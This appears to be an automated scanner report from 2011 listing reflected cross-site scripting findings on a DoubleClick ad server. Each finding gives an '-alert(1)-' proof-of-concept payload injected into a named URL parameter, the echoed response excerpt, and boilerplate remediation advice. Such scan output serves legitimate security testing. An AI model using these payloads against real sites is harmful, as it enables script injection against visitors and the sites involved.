Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7327 Cache-Control: no-cache Pragma: no-cache Date: Tue, 28 Jun 2011 02:10:01 GMT Expires: Tue, 28 Jun 2011 02:10:01 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... %3B41422311/41440098/1%3B%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956%0059830"-alert(1)-"d8f92070b1e&_pn=17474528&redirect=https://quote.allstate.com?quote=PQ&cid=BAC-Xplus1&att=61840000;41496760&&TFN=8664972899&Campaign=222230000010575"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]...
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1864"-alert(1)-"ddf059404d1 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7373 Date: Tue, 28 Jun 2011 02:10:24 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... %3Bu%3D17474528%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528b1864"-alert(1)-"ddf059404d1&redirect=https%3a%2f%2fquote.allstate.com%3Fquote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000%3B41883805%26%26TFN%3D8664972899%26Campaign%3D222230000010575"); var fscUrl = url; var fscUrlClickTagFound = ...[SNIP]...
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1beaa'-alert(1)-'9e65c854819 was submitted in the _a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c33f5'-alert(1)-'4dfa122d9d8 was submitted in the _c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbe36'-alert(1)-'583b7cb77ec was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 708c8'-alert(1)-'68bf9185ea8 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88478'-alert(1)-'cd68f8a5b was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22a18'-alert(1)-'99b4bb5bd72 was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9639'-alert(1)-'96a1af39904 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfdeb'-alert(1)-'000ca2f821b was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d6cb'-alert(1)-'6f19826f6fc was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df183'-alert(1)-'09e6c884d7f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66b56'-alert(1)-'2689d224978 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15154'-alert(1)-'d86740d32ed was submitted in the _a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4401 Date: Tue, 28 Jun 2011 01:29:38 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 300x250_Static.gif'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=182261715154'-alert(1)-'d86740d32ed&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201105/index.aspx%3Fsrc%3DX1PMIA'; var target = '_blank'; var dcbgcolor = '' ...[SNIP]...
The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ba80'-alert(1)-'b278081406c was submitted in the _c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4921 Date: Tue, 28 Jun 2011 01:30:06 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... ivewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=18072551ba80'-alert(1)-'b278081406c&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201101/index_v1.aspx%3Facmpgn%3D111_X1_300x250_feel_X1FEELA%26src%3DX1FEELA'; var target = '_blank'; var dcb ...[SNIP]...
The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6df45'-alert(1)-'3a47738f921 was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4921 Date: Tue, 28 Jun 2011 01:29:57 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=179021606df45'-alert(1)-'3a47738f921&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201101/index_v1.aspx%3Facmpgn%3D111_X1_300x250_feel_X1FEELA%26src%3DX1FEELA'; var target = '_blan ...[SNIP]...
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cf8f'-alert(1)-'f8a532e7701 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4644 Date: Tue, 28 Jun 2011 01:29:19 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... ://s0.2mdn.net/2279893/build_osa_300x250.gif'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=979567cf8f'-alert(1)-'f8a532e7701&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201007/index.aspx%3Fsrc%3DX1BUILDA'; var target = ...[SNIP]...
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 590be'-alert(1)-'10e500e253b was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4401 Date: Tue, 28 Jun 2011 01:29:28 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 93/DBVault_300x250_Static.gif'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494590be'-alert(1)-'10e500e253b&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201105/index.aspx%3Fsrc%3DX1PMIA'; var target = '_blank'; var dcb ...[SNIP]...
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22438'-alert(1)-'30165b56046 was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4401 Date: Tue, 28 Jun 2011 01:29:09 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 'http://s0.2mdn.net/2279893/DBVault_300x250_Static.gif'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=1561922438'-alert(1)-'30165b56046&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201105/index.aspx%3Fsrc%3DX1PMIA'; var t ...[SNIP]...
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7318'-alert(1)-'1d7b10ff8e1 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4921 Date: Tue, 28 Jun 2011 01:30:16 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956f7318'-alert(1)-'1d7b10ff8e1&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201101/index_v1.aspx%3Facmpgn%3D111_X1_300x250_feel_X1FEELA%26src%3DX1FEELA'; var target = '_blank'; var dcbgcolor = ' ...[SNIP]...
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f697a'-alert(1)-'2dcff89fe8 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4640 Date: Tue, 28 Jun 2011 01:30:25 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... cwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758f697a'-alert(1)-'2dcff89fe8&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201007/index.aspx%3Fsrc%3DX1BUILDA'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/2279893/300x250.swf ...[SNIP]...
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90f62'-alert(1)-'94227e935c8 was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4644 Date: Tue, 28 Jun 2011 01:29:47 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 0x250.gif'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=1168390f62'-alert(1)-'94227e935c8&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201007/index.aspx%3Fsrc%3DX1BUILDA'; var target = '_blank'; var dcbgcolor = ''; var d ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2b90'-alert(1)-'b8a211ccb10 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4829 Cache-Control: no-cache Pragma: no-cache Date: Tue, 28 Jun 2011 01:30:26 GMT Expires: Tue, 28 Jun 2011 01:30:26 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0c&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=c2b90'-alert(1)-'b8a211ccb10http://fb.discoverbank.com/campaigns/products/savings/201101/index_v1.aspx?acmpgn=111_X1_300x250_feel_X1FEELA&src=X1FEELA'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/22 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff824'-alert(1)-'e40b80e5cff was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4644 Date: Tue, 28 Jun 2011 01:29:00 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... ; var dcgif = 'http://s0.2mdn.net/2279893/build_osa_300x250.gif'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=b521ae11-96f9-41be-a16f-c0f05cc12e0cff824'-alert(1)-'e40b80e5cff&_o=15619&_eo=97956&_et=1309224494&_a=1822617&_s=11683&_d=17902160&_c=1807255&_pm=97956&_pn=17908758&redirect=http%3a%2f%2ffb.discoverbank.com/campaigns/products/savings/201007/index.aspx%3Fsrc%3DX1BUI ...[SNIP]...
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6436'-alert(1)-'d8cc99c698b was submitted in the _a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4313 Date: Tue, 28 Jun 2011 02:17:18 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... FINAL_300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852f6436'-alert(1)-'d8cc99c698b&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/getapp%3Fsc%3DKBD6'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'ht ...[SNIP]...
The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fc7c'-alert(1)-'e931caa6fc4 was submitted in the _c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4297 Date: Tue, 28 Jun 2011 02:18:22 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... tivewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=369835fc7c'-alert(1)-'e931caa6fc4&_pm=97956&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/display%3FpageFileId%3Dmore15%26sc%3DKBC6'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0 ...[SNIP]...
The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f42d'-alert(1)-'97132edf540 was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4194 Date: Tue, 28 Jun 2011 02:18:01 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... ar dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=171848565f42d'-alert(1)-'97132edf540&_c=36983&_pm=97956&_pn=17185423&redirect=http%3a%2f%2fdiscovercard.com/credit-cards/cardbuilder/index.html%3Fiq_id%3Do1112'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/ ...[SNIP]...
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a976'-alert(1)-'0dc5b971d37 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4194 Date: Tue, 28 Jun 2011 02:16:31 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... = 'http://s0.2mdn.net/1796512/CB300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=979566a976'-alert(1)-'0dc5b971d37&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=http%3a%2f%2fdiscovercard.com/credit-cards/cardbuilder/index.html%3Fiq_id%3Do1112'; var target = '_blank'; var ...[SNIP]...
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3599e'-alert(1)-'ee68f7e2a73 was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4313 Date: Tue, 28 Jun 2011 02:16:50 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 12/OpenRoad_FINAL_300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=13092273103599e'-alert(1)-'ee68f7e2a73&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/getapp%3Fsc%3DKBD6'; var target = '_blank'; var dcbgcolor = ''; var ...[SNIP]...
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19ef6'-alert(1)-'386b12da849 was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4297 Date: Tue, 28 Jun 2011 02:16:08 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... f = 'http://s0.2mdn.net/1796512/pickAcard300x250v2.JPG'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=1575519ef6'-alert(1)-'386b12da849&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/display%3FpageFileId%3Dmore15%26sc%3DKBC6' ...[SNIP]...
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae57a'-alert(1)-'cfb43500a9c was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4313 Date: Tue, 28 Jun 2011 02:18:40 GMT
